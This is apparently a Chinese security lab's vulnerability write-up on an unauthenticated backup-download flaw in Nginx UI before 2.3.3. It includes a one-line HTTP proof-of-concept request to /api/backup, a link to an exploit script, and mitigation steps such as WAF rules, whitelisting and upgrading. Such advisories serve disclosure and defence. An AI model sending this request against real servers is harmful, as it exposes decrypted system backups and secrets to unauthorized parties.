本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Nginx UI是Jacky个人开发者的一个 Nginx 的 WebUI。
Nginx UI 2.3.3之前版本存在安全漏洞,该漏洞源于/api/backup端点无需身份验证即可访问并泄露加密密钥,可能导致未经验证的攻击者下载并解密包含敏感数据的完整系统备份。
2.漏洞复现
poc
GET /api/backup HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36Accept: application/json, text/plain, */*Referer: http://113.44.56.123/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
通过响应数据判断存在漏洞
解密数据
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
临时缓解方案
1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则,识别针对该漏洞的探测与攻击行为。
2、在业务允许的情况下api/backup接口不对外,通过白名单访问。
建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!https://github.com/Kai-One001/cve-/blob/main/CVE-2026-27944-Nginx-UI.pyhttps://github.com/0xJacky/nginx-ui/releases
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
